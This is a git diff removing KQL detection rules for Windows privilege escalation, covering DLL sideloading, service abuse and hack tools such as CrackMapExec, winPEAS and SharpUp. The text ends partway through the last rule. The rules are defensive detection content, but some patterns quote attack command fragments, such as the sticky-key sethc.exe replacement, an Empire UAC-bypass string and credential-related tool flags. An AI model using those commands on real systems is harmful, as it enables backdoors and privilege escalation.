diff --git a/Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql b/Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
deleted file mode 100644
index 056a9e92..00000000
--- a/Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/07/30
-// Level: high
-// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
-but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql b/Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
deleted file mode 100644
index 29170ff9..00000000
--- a/Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/01
-// Level: high
-// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellChromeAPI.dll"
\ No newline at end of file
diff --git a/Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql b/Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql
deleted file mode 100644
index 5f8aed77..00000000
--- a/Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: omkar72, oscd.community
-// Date: 2020/10/14
-// Level: high
-// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
-// Tags: attack.execution, attack.privilege_escalation, attack.t1055
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql b/Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql
deleted file mode 100644
index 37c43d0b..00000000
--- a/Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
-// Date: 2020/09/10
-// Level: medium
-// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.012
-DeviceRegistryEvents
-| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql b/Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql b/Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql
deleted file mode 100644
index a4dbd554..00000000
--- a/Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco
-// Date: 2019/08/30
-// Level: critical
-// Description: Detects some Empire PowerShell UAC bypass methods
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);"
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql b/Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql
deleted file mode 100644
index 38bdaaa1..00000000
--- a/Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/27
-// Level: high
-// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1134.001, attack.t1134.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql b/Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql
deleted file mode 100644
index 335281d7..00000000
--- a/Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/20
-// Level: critical
-// Description: Detects the use of SharpUp, a tool for local privilege escalation
-// Tags: attack.privilege_escalation, attack.t1615, attack.t1569.002, attack.t1574.005
-DeviceProcessEvents
-| where FolderPath endswith "\\SharpUp.exe" or ProcessVersionInfoFileDescription =~ "SharpUp" or (ProcessCommandLine contains "HijackablePaths" or ProcessCommandLine contains "UnquotedServicePath" or ProcessCommandLine contains "ProcessDLLHijack" or ProcessCommandLine contains "ModifiableServiceBinaries" or ProcessCommandLine contains "ModifiableScheduledTask" or ProcessCommandLine contains "DomainGPPPassword" or ProcessCommandLine contains "CachedGPPPassword")
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_WinPwn_Execution.kql b/Privilege Escalation/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Privilege Escalation/HackTool_-_WinPwn_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Privilege Escalation/HackTool_-_winPEAS_Execution.kql b/Privilege Escalation/HackTool_-_winPEAS_Execution.kql
deleted file mode 100644
index 320e767a..00000000
--- a/Privilege Escalation/HackTool_-_winPEAS_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Georg Lauenstein (sure[secure])
-// Date: 2022/09/19
-// Level: high
-// Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
-// Tags: attack.privilege_escalation, attack.t1082, attack.t1087, attack.t1046
-DeviceProcessEvents
-| where ProcessCommandLine contains "https://github.com/carlospolop/PEASS-ng/releases/latest/download/" or (ProcessCommandLine contains " applicationsinfo" or ProcessCommandLine contains " browserinfo" or ProcessCommandLine contains " eventsinfo" or ProcessCommandLine contains " fileanalysis" or ProcessCommandLine contains " filesinfo" or ProcessCommandLine contains " processinfo" or ProcessCommandLine contains " servicesinfo" or ProcessCommandLine contains " windowscreds") or (InitiatingProcessCommandLine endswith " -linpeas" or ProcessCommandLine endswith " -linpeas") or (ProcessVersionInfoOriginalFileName =~ "winPEAS.exe" or (FolderPath endswith "\\winPEASany_ofs.exe" or FolderPath endswith "\\winPEASany.exe" or FolderPath endswith "\\winPEASx64_ofs.exe" or FolderPath endswith "\\winPEASx64.exe" or FolderPath endswith "\\winPEASx86_ofs.exe" or FolderPath endswith "\\winPEASx86.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/Interactive_AT_Job.kql b/Privilege Escalation/Interactive_AT_Job.kql
deleted file mode 100644
index 47f1d4f1..00000000
--- a/Privilege Escalation/Interactive_AT_Job.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detects an interactive AT job, which may be used as a form of privilege escalation.
-// Tags: attack.privilege_escalation, attack.t1053.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "interactive" and FolderPath endswith "\\at.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/LiveKD_Driver_Creation.kql b/Privilege Escalation/LiveKD_Driver_Creation.kql
deleted file mode 100644
index 7e5f529f..00000000
--- a/Privilege Escalation/LiveKD_Driver_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: medium
-// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS"
\ No newline at end of file
diff --git a/Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql b/Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql
deleted file mode 100644
index 69e1685e..00000000
--- a/Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql b/Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql
deleted file mode 100644
index 003653f9..00000000
--- a/Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\livekd.dmp"
\ No newline at end of file
diff --git a/Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql b/Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
deleted file mode 100644
index a55dc381..00000000
--- a/Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/08/12
-// Level: high
-// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
-Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql b/Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql
deleted file mode 100644
index 2be19bac..00000000
--- a/Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2021/07/12
-// Level: high
-// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
-DeviceProcessEvents
-| where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/Microsoft_Office_DLL_Sideload.kql b/Privilege Escalation/Microsoft_Office_DLL_Sideload.kql
deleted file mode 100644
index 7003f77d..00000000
--- a/Privilege Escalation/Microsoft_Office_DLL_Sideload.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: high
-// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")))
\ No newline at end of file
diff --git a/Privilege Escalation/Modify_Group_Policy_Settings.kql b/Privilege Escalation/Modify_Group_Policy_Settings.kql
deleted file mode 100644
index 45d1feba..00000000
--- a/Privilege Escalation/Modify_Group_Policy_Settings.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1484.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql b/Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql
deleted file mode 100644
index 7fba55a2..00000000
--- a/Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: high
-// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup"
\ No newline at end of file
diff --git a/Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql b/Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql
deleted file mode 100644
index 1dbdb0cb..00000000
--- a/Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/14
-// Level: medium
-// Description: Detects creation of a new service (kernel driver) with the type "kernel"
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/New_Service_Creation_Using_PowerShell.kql b/Privilege Escalation/New_Service_Creation_Using_PowerShell.kql
deleted file mode 100644
index ce9fb3fa..00000000
--- a/Privilege Escalation/New_Service_Creation_Using_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2023/02/20
-// Level: low
-// Description: Detects the creation of a new service using powershell.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName"
\ No newline at end of file
diff --git a/Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql b/Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql
deleted file mode 100644
index dd56c1e4..00000000
--- a/Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2023/02/20
-// Level: low
-// Description: Detects the creation of a new service using the "sc.exe" utility.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql b/Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql
deleted file mode 100644
index ef12160b..00000000
--- a/Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/06/19
-// Level: high
-// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
-Adversaries may abuse time providers to execute DLLs when the system boots.
-The Windows Time service (W32Time) enables time synchronization across and within domains.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.003
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL"))))
\ No newline at end of file
diff --git a/Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql b/Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql
deleted file mode 100644
index 67f96f11..00000000
--- a/Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/21
-// Level: high
-// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-"
\ No newline at end of file
diff --git a/Privilege Escalation/PUA_-_AdvancedRun_Execution.kql b/Privilege Escalation/PUA_-_AdvancedRun_Execution.kql
deleted file mode 100644
index 4e6050fc..00000000
--- a/Privilege Escalation/PUA_-_AdvancedRun_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/20
-// Level: medium
-// Description: Detects the execution of AdvancedRun utility
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ")
\ No newline at end of file
diff --git a/Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql b/Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql
deleted file mode 100644
index c00dd12f..00000000
--- a/Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/20
-// Level: high
-// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1134.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11"))
\ No newline at end of file
diff --git a/Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql b/Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql
deleted file mode 100644
index 1282a6c6..00000000
--- a/Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/02
-// Level: high
-// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
-// Tags: attack.execution, attack.privilege_escalation, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql
deleted file mode 100644
index 5662813f..00000000
--- a/Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql b/Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql
deleted file mode 100644
index 0e968bc4..00000000
--- a/Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bartlomiej Czyz @bczyz1, oscd.community
-// Date: 2020/10/11
-// Level: medium
-// Description: Detects value modification of registry key containing path to binary used as screensaver.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql b/Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql
deleted file mode 100644
index 17643f89..00000000
--- a/Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Sreeman
-// Date: 2020/02/18
-// Level: critical
-// Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.
-When the sticky keys are "activated" the privilleged shell is launched.
-
-// Tags: attack.t1546.008, attack.privilege_escalation
-DeviceProcessEvents
-| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "/y " and ProcessCommandLine contains "C:\\windows\\system32\\cmd.exe C:\\windows\\system32\\sethc.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql b/Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql
deleted file mode 100644
index 8867fa02..00000000
--- a/Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov
-// Date: 2019/10/26
-// Level: high
-// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\sc.exe" and ProcessIntegrityLevel =~ "Medium") and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_7za.DLL_Sideloading.kql b/Privilege Escalation/Potential_7za.DLL_Sideloading.kql
deleted file mode 100644
index f1cc961b..00000000
--- a/Privilege Escalation/Potential_7za.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/06/09
-// Level: low
-// Description: Detects potential DLL sideloading of "7za.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql b/Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql
deleted file mode 100644
index e192e978..00000000
--- a/Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "AVKkid.dll"
